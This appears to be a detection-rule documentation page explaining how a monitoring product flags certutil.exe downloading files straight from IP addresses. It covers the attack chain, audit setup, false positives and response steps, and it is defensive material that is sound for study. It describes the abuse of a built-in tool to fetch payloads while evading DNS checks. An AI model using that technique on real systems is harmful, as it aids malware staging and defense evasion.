About the rule

Rule Type

Standard

Rule Description

Certutil.exe is a legitimate Windows utility used for certificate management, but threat actors frequently abuse it to download malicious payloads. This rule detects scenarios where certutil.exe is used to download files directly from an IP address instead of a domain—an indicator of potentially evasive behavior. Attackers favor IP-based URLs to avoid DNS-based detection and reputation checks. This technique is commonly observed in living-off-the-land attacks, where built-in tools like certutil are leveraged to bypass security controls and execute or stage further malicious payloads.

Severity

Trouble

Rule journey

Attack chain scenario

Initial access → Execution → Living-off-the-land binary (LOLBins) abuse → certutil.exe used to download file → Direct IP connection to avoid domain detection → File execution → Persistence or lateral movement

Impact

• Malware deployment
• Defense evasion
• Persistence
• Lateral movement
• Data exfiltration

Rule Requirement

Prerequisites

Using Windows event viewer:
To enable detailed process tracking in a domain environment, log in to a domain controller using domain admin credentials and open the Group Policy Management Console (GPMC). Create or edit a GPO linked to the target OU and navigate to the Advanced Audit Policy Configuration section to enable success auditing for both process creation and termination. To capture command-line details, enable the Include command line in process creation events setting under Audit Process Creation. Additionally, create the Microsoft-Windows-Security-Auditing/Operational registry key in the specified EventLog path to support enhanced auditing.

Using Sysmon:
To enable detailed process monitoring using Sysmon, first download and install it from Microsoft Sysinternals. Run Command Prompt as an administrator and install Sysmon with a configuration file that includes process creation tracking using sysmon.exe -i [configfile.xml]. Ensure your configuration includes a <ProcessCreate> filter to capture all process creation events. Additionally, create the Microsoft-Windows-Sysmon/Operational registry key under the EventLog path if it doesn’t already exist.

Criteria

Detection

Execution Mode

realtime

Log Sources

Windows

MITRE ATT&CK

Defense Evasion: Obfuscated Files or Information (T1027)

Security standard:

Enabling this rule will help you meet the security standard's requirement listed below:

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events

When this rule is triggered, you're notified of a file being downloaded directly from an IP address using certutil.exe—a dual-use tool often abused by attackers.

Author

Nasreddine Bencherchali (Nextron Systems)

Future actions

Known False Positives

This rule may be triggered by legitimate administrative or troubleshooting activities where certutil.exe is used to download files directly from an IP address, such as in air-gapped environments, script-based deployments, or isolated testing labs.

Next Steps

When this rule is triggered, the following measures can be implemented:

• Identification: Identify if the file download via certutil.exe from a direct IP is expected behavior. Check if the action originated from a user-initiated script or unknown process.
• Analysis: Trace the command line, parent process, and user account associated with the event. Inspect the downloaded file’s hash, analyze it in a sandbox, and determine whether it matches known malicious signatures.
• Response: Isolate the endpoint, terminate the process, and quarantine the downloaded file. Block the source IP at the firewall and initiate a full endpoint and network scan.
• Monitor certutil.exe: Restrict use of certutil.exe via application control policies.

Mitigation